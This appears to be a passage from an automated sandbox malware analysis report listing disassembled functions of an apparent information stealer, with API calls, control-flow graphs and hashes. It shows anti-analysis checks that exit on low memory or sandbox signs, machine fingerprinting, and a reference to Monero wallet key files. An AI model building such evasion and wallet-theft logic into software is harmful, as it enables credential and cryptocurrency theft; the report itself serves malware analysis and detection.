                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 4cc23e28d8751c23c30380510e996bddf3d931a115341fd368cc0dc059684357
                              • Instruction ID: c88f72485f932ddecb2ea623aaaaf2808cf867cfeb530843a0a31177e5483dc6
                              • Opcode Fuzzy Hash: 4cc23e28d8751c23c30380510e996bddf3d931a115341fd368cc0dc059684357
                              • Instruction Fuzzy Hash: BB715D71A50218EBDF24DFA0DC49BEE77B8BB44700F108299F50A6B190DBB86A85DF51
                              Function 007A5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 7a5510-7a5577 call 7a5ad0 call 7aa820 * 3 call 7aa740 * 4 1106 7a557c-7a5583 1090->1106 1107 7a55d7-7a564c call 7aa740 * 2 call 791590 call 7a52c0 call 7aa8a0 call 7aa800 call 7aaad0 StrCmpCA 1106->1107 1108 7a5585-7a55b6 call 7aa820 call 7aa7a0 call 791590 call 7a51f0 1106->1108 1134 7a5693-7a56a9 call 7aaad0 StrCmpCA 1107->1134 1138 7a564e-7a568e call 7aa7a0 call 791590 call 7a51f0 call 7aa8a0 call 7aa800 1107->1138 1123 7a55bb-7a55d2 call 7aa8a0 call 7aa800 1108->1123 1123->1134 1139 7a56af-7a56b6 1134->1139 1140 7a57dc-7a5844 call 7aa8a0 call 7aa820 * 2 call 791670 call 7aa800 * 4 call 7a6560 call 791550 1134->1140 1138->1134 1142 7a57da-7a585f call 7aaad0 StrCmpCA 1139->1142 1143 7a56bc-7a56c3 1139->1143 1269 7a5ac3-7a5ac6 1140->1269 1162 7a5991-7a59f9 call 7aa8a0 call 7aa820 * 2 call 791670 call 7aa800 * 4 call 7a6560 call 791550 1142->1162 1163 7a5865-7a586c 1142->1163 1146 7a571e-7a5793 call 7aa740 * 2 call 791590 call 7a52c0 call 7aa8a0 call 7aa800 call 7aaad0 StrCmpCA 1143->1146 1147 7a56c5-7a5719 call 7aa820 call 7aa7a0 call 791590 call 7a51f0 call 7aa8a0 call 7aa800 1143->1147 1146->1142 1245 7a5795-7a57d5 call 7aa7a0 call 791590 call 7a51f0 call 7aa8a0 call 7aa800 1146->1245 1147->1142 1162->1269 1168 7a598f-7a5a14 call 7aaad0 StrCmpCA 1163->1168 1169 7a5872-7a5879 1163->1169 1198 7a5a28-7a5a91 call 7aa8a0 call 7aa820 * 2 call 791670 call 7aa800 * 4 call 7a6560 call 791550 1168->1198 1199 7a5a16-7a5a21 Sleep 1168->1199 1175 7a587b-7a58ce call 7aa820 call 7aa7a0 call 791590 call 7a51f0 call 7aa8a0 call 7aa800 1169->1175 1176 7a58d3-7a5948 call 7aa740 * 2 call 791590 call 7a52c0 call 7aa8a0 call 7aa800 call 7aaad0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 7a594a-7a598a call 7aa7a0 call 791590 call 7a51f0 call 7aa8a0 call 7aa800 1176->1274 1198->1269 1199->1106 1245->1142 1274->1168
                              APIs
                                • Part of subcall function 007AA820: lstrlen.KERNEL32(00794F05,?,?,00794F05,007B0DDE), ref: 007AA82B
                                • Part of subcall function 007AA820: lstrcpy.KERNEL32(007B0DDE,00000000), ref: 007AA885
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5857
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5228
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5318
                                • Part of subcall function 007A52C0: lstrlen.KERNEL32(00000000), ref: 007A532F
                                • Part of subcall function 007A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 007A5364
                                • Part of subcall function 007A52C0: lstrlen.KERNEL32(00000000), ref: 007A5383
                                • Part of subcall function 007A52C0: lstrlen.KERNEL32(00000000), ref: 007A53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007A5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 007A5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 8ef1038424ded5a292af9afe512869ab95a23150c589de7f2f239a1e6fa26f2f
                              • Instruction ID: dd9afa0c38d86f3a84980ad3eee1fad2a0807fe56478fd82d1019848046f9751
                              • Opcode Fuzzy Hash: 8ef1038424ded5a292af9afe512869ab95a23150c589de7f2f239a1e6fa26f2f
                              • Instruction Fuzzy Hash: 3BE15472910104EBCB55FBA0EC5AAFE7378AF95300F908229B50756191EF3C6F59CB92
                              Function 007A17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 7a17a0-7a17cd call 7aaad0 StrCmpCA 1304 7a17cf-7a17d1 ExitProcess 1301->1304 1305 7a17d7-7a17f1 call 7aaad0 1301->1305 1309 7a17f4-7a17f8 1305->1309 1310 7a17fe-7a1811 1309->1310 1311 7a19c2-7a19cd call 7aa800 1309->1311 1313 7a199e-7a19bd 1310->1313 1314 7a1817-7a181a 1310->1314 1313->1309 1316 7a187f-7a1890 StrCmpCA 1314->1316 1317 7a185d-7a186e StrCmpCA 1314->1317 1318 7a1932-7a1943 StrCmpCA 1314->1318 1319 7a1913-7a1924 StrCmpCA 1314->1319 1320 7a1970-7a1981 StrCmpCA 1314->1320 1321 7a18f1-7a1902 StrCmpCA 1314->1321 1322 7a1951-7a1962 StrCmpCA 1314->1322 1323 7a1835-7a1844 call 7aa820 1314->1323 1324 7a1849-7a1858 call 7aa820 1314->1324 1325 7a18cf-7a18e0 StrCmpCA 1314->1325 1326 7a198f-7a1999 call 7aa820 1314->1326 1327 7a18ad-7a18be StrCmpCA 1314->1327 1328 7a1821-7a1830 call 7aa820 1314->1328 1333 7a189e-7a18a1 1316->1333 1334 7a1892-7a189c 1316->1334 1331 7a187a 1317->1331 1332 7a1870-7a1873 1317->1332 1343 7a194f 1318->1343 1344 7a1945-7a1948 1318->1344 1341 7a1930 1319->1341 1342 7a1926-7a1929 1319->1342 1348 7a198d 1320->1348 1349 7a1983-7a1986 1320->1349 1339 7a190e 1321->1339 1340 7a1904-7a1907 1321->1340 1345 7a196e 1322->1345 1346 7a1964-7a1967 1322->1346 1323->1313 1324->1313 1337 7a18ec 1325->1337 1338 7a18e2-7a18e5 1325->1338 1326->1313 1335 7a18ca 1327->1335 1336 7a18c0-7a18c3 1327->1336 1328->1313 1331->1313 1332->1331 1353 7a18a8 1333->1353 1334->1353 1335->1313 1336->1335 1337->1313 1338->1337 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1313 1346->1345 1348->1313 1349->1348 1353->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 007A17C5
                              • ExitProcess.KERNEL32 ref: 007A17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 92fff3305a9132ec34140b80909fc6b7d143c19e8212e72029fe3bb01ced5571
                              • Instruction ID: ead0c77ef6c8acdb01755072ca7b4ad2e6bf3f3ec029c41b91ad998bccb8d11a
                              • Opcode Fuzzy Hash: 92fff3305a9132ec34140b80909fc6b7d143c19e8212e72029fe3bb01ced5571
                              • Instruction Fuzzy Hash: AF5199B4B04209EBEB04DFA0C854BBF37B9BF85300F508249F806A7290D778E951DB62
                              Function 007A7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 7a7500-7a754a GetWindowsDirectoryA 1357 7a754c 1356->1357 1358 7a7553-7a75c7 GetVolumeInformationA call 7a8d00 * 3 1356->1358 1357->1358 1365 7a75d8-7a75df 1358->1365 1366 7a75fc-7a7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 7a75e1-7a75fa call 7a8d00 1365->1367 1368 7a7628-7a7658 wsprintfA call 7aa740 1366->1368 1369 7a7619-7a7626 call 7aa740 1366->1369 1367->1365 1377 7a767e-7a768e 1368->1377 1369->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007A7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007A757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A760A
                              • wsprintfA.USER32 ref: 007A7640
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\${
                              • API String ID: 1544550907-1442128683
                              • Opcode ID: 379cb15e6a6036c929e98de950d796a7825c547d46ca5d375d810676352e246e
                              • Instruction ID: d6957c8579491492aa7697de3179b1854bd5a4ec1164ec763d67677678ca84f8
                              • Opcode Fuzzy Hash: 379cb15e6a6036c929e98de950d796a7825c547d46ca5d375d810676352e246e
                              • Instruction Fuzzy Hash: 834183B1E45248EBDB14DF94DC45BEEBBB8AF49700F100199F50967280D778AA84CBA5
                              Function 007A69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C23B0), ref: 007A98A1
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C23C8), ref: 007A98BA
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2200), ref: 007A98D2
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C23E0), ref: 007A98EA
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2410), ref: 007A9903
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C8F30), ref: 007A991B
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014B52F0), ref: 007A9933
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014B5390), ref: 007A994C
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2428), ref: 007A9964
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2440), ref: 007A997C
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2458), ref: 007A9995
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C2170), ref: 007A99AD
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014B53F0), ref: 007A99C5
                                • Part of subcall function 007A9860: GetProcAddress.KERNEL32(74DD0000,014C21B8), ref: 007A99DE
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007911D0: ExitProcess.KERNEL32 ref: 00791211
                                • Part of subcall function 00791160: GetSystemInfo.KERNEL32(?), ref: 0079116A
                                • Part of subcall function 00791160: ExitProcess.KERNEL32 ref: 0079117E
                                • Part of subcall function 00791110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0079112B
                                • Part of subcall function 00791110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00791132
                                • Part of subcall function 00791110: ExitProcess.KERNEL32 ref: 00791143
                                • Part of subcall function 00791220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0079123E
                                • Part of subcall function 00791220: __aulldiv.LIBCMT ref: 00791258
                                • Part of subcall function 00791220: __aulldiv.LIBCMT ref: 00791266
                                • Part of subcall function 00791220: ExitProcess.KERNEL32 ref: 00791294
                                • Part of subcall function 007A6770: GetUserDefaultLangID.KERNEL32 ref: 007A6774
                                • Part of subcall function 00791190: ExitProcess.KERNEL32 ref: 007911C6
                                • Part of subcall function 007A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007911B7), ref: 007A7880
                                • Part of subcall function 007A7850: RtlAllocateHeap.NTDLL(00000000), ref: 007A7887
                                • Part of subcall function 007A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 007A789F
                                • Part of subcall function 007A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007A7910
                                • Part of subcall function 007A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 007A7917
                                • Part of subcall function 007A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 007A792F
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007A6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 007A6AF9
                              • Sleep.KERNEL32(00001770), ref: 007A6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6B1A
                              • ExitProcess.KERNEL32 ref: 007A6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 3306c313b559bdbe552b6095f694e17d8184aa584bc2e10c52340092edf030a5
                              • Instruction ID: c898340ee6fe3e613d9a0967f0a73b8b11e7dbec5fc45603042e932084c08025
                              • Opcode Fuzzy Hash: 3306c313b559bdbe552b6095f694e17d8184aa584bc2e10c52340092edf030a5
                              • Instruction Fuzzy Hash: 25314B70954208FADB04FBF0DC5ABEE7778AF86300F504629F202A2192DF7C6941C7A2
                              Function 00791220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 791220-791247 call 7a89b0 GlobalMemoryStatusEx 1439 791249-791271 call 7ada00 * 2 1436->1439 1440 791273-79127a 1436->1440 1442 791281-791285 1439->1442 1440->1442 1444 79129a-79129d 1442->1444 1445 791287 1442->1445 1447 791289-791290 1445->1447 1448 791292-791294 ExitProcess 1445->1448 1447->1444 1447->1448
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0079123E
                              • __aulldiv.LIBCMT ref: 00791258
                              • __aulldiv.LIBCMT ref: 00791266
                              • ExitProcess.KERNEL32 ref: 00791294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 2ca7aec359c3e0d99a1522ce7c5e3a49bd71f5d4829c0162dda0ea79994eadd4
                              • Instruction ID: 70d0654210a57a7790b959a43d2fcfda863b56fb53957cc7fef7f423f915d3bb
                              • Opcode Fuzzy Hash: 2ca7aec359c3e0d99a1522ce7c5e3a49bd71f5d4829c0162dda0ea79994eadd4
                              • Instruction Fuzzy Hash: 8A016DB0E44308FAEF10EBE0DD49B9EBB78BB44701F608149E706B62C0D7786A518799
                              Function 007A6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 7a6af3 1451 7a6b0a 1450->1451 1453 7a6aba-7a6ad7 call 7aaad0 OpenEventA 1451->1453 1454 7a6b0c-7a6b22 call 7a6920 call 7a5b10 CloseHandle ExitProcess 1451->1454 1460 7a6ad9-7a6af1 call 7aaad0 CreateEventA 1453->1460 1461 7a6af5-7a6b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007A6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 007A6AF9
                              • Sleep.KERNEL32(00001770), ref: 007A6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014C8FF0,?,007B110C,?,00000000,?,007B1110,?,00000000,007B0AEF), ref: 007A6B1A
                              • ExitProcess.KERNEL32 ref: 007A6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 4172f4fb8a471e05f65ef22e5d18f34252d31bbeff0c1a3062b5edd38ee39615
                              • Instruction ID: 9922c091587982c6ff08e5f1f4ca8e9f54a74d141bc9fc8928bd016783755a47
                              • Opcode Fuzzy Hash: 4172f4fb8a471e05f65ef22e5d18f34252d31bbeff0c1a3062b5edd38ee39615
